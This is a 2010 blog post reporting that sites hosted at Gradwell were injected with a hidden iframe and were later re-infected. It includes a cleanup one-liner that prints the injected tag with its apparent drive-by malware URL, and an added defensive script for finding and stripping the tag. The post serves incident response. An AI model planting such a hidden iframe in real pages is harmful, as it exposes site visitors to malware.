Gradwell Hacked

I woke up this morning to find all my clients' sites hosted at Gradwell have been hacked.

A quick poke around on shows that many other sites hosted on Gradwell's cluster have been similarly altered.

The hacker has added some HTML for a hidden iframe which points to a remote site. Presumably this site serves some sort of drive-by download attack.

Here's the code that is either prepended or appended to all .php and .html files:

<iframe src="" style="display:none"></iframe>

I cleaned up the files as soon as I noticed the attack with this one-liner:

find . \( -name '*.php' -o -name '*.html' \) -print0 | xargs -0 -n1 perl -pi -e 's#<iframe src="http://gaccess\.dynsite\.net/blog/wp-content/0wn3d/" style="display:none"></iframe>##'

(NB: this should all be on one line)
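As an added example (not the original post's one-liner, and not Gradwell's tooling), here is a small defender-side script that does the same job in two separate steps: first list which .php/.html files carry the hidden-iframe marker, then strip it while keeping a .bak copy of each infected file as evidence for the support ticket. The marker URL below (example.invalid) is a constructed placeholder; replace it with the exact tag found in your files. Matching is done with a fixed string instead of an escaped regex, and find/grep are driven NUL-safely so paths with spaces survive.

```shell
#!/bin/sh
# Added example, not from the original post. Locates .php/.html files that
# carry a hidden-iframe injection and strips it, keeping a .bak copy of every
# file it touches. MARKER is an assumed placeholder for the injected tag.
MARKER='<iframe src="http://example.invalid/0wn3d/" style="display:none"></iframe>'

# Print the path of every .php/.html file under $1 that contains $MARKER.
# grep -F matches the tag literally, so no regex escaping is needed.
find_injected() {
    find "$1" -type f \( -name '*.php' -o -name '*.html' \) \
        -exec grep -lF -- "$MARKER" {} +
}

# Number of infected files under $1 (handy for a before/after comparison).
count_injected() {
    find_injected "$1" | wc -l | tr -d ' '
}

# Remove every occurrence of $MARKER from one file, in place, after saving a
# timestamp-preserving copy as FILE.bak so the evidence is not destroyed.
strip_injection() {
    f="$1"
    cp -p -- "$f" "$f.bak"
    awk -v m="$MARKER" '
        { i = index($0, m)
          while (i > 0) { $0 = substr($0, 1, i - 1) substr($0, i + length(m)); i = index($0, m) }
          print }' "$f.bak" > "$f"
}

# Clean every infected file under $1.
clean_tree() {
    find_injected "$1" | while IFS= read -r f; do strip_injection "$f"; done
}

# Usage: sh scan.sh /path/to/htdocs          (list infected files)
#        sh scan.sh /path/to/htdocs --clean  (strip the tag, keep .bak copies)
if [ "$#" -ge 1 ]; then
    case "$2" in
        --clean) clean_tree "$1" ;;
        *)       find_injected "$1" ;;
    esac
fi
```

Run the listing mode first and save its output; a second run an hour later (as the post's re-infection suggests) tells you whether the cleanup held or the attacker still has write access.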

The files were re-infected an hour or so later. Re-infection seems to have stopped now.

The attacker evidently has access to the entire home directory, not just the Apache web root, as library files outside the web root were also affected.

I reported the breach to support and am awaiting the outcome.

Luckily for me, the Primesolid site wasn't affected as I no longer host it at Gradwell.

There's a thread about this on


Peter Gradwell says: there must be some sort of exploit in Apache itself so we are also looking at that, and its permissions model.

Update 2010-12-19 10:03

Gradwell have been hacked again this morning.

Exactly the same attack code has been added to all .php and .html files. Timestamps have been updated to 2010-12-19 05:22. :-/

  • December 15, 2010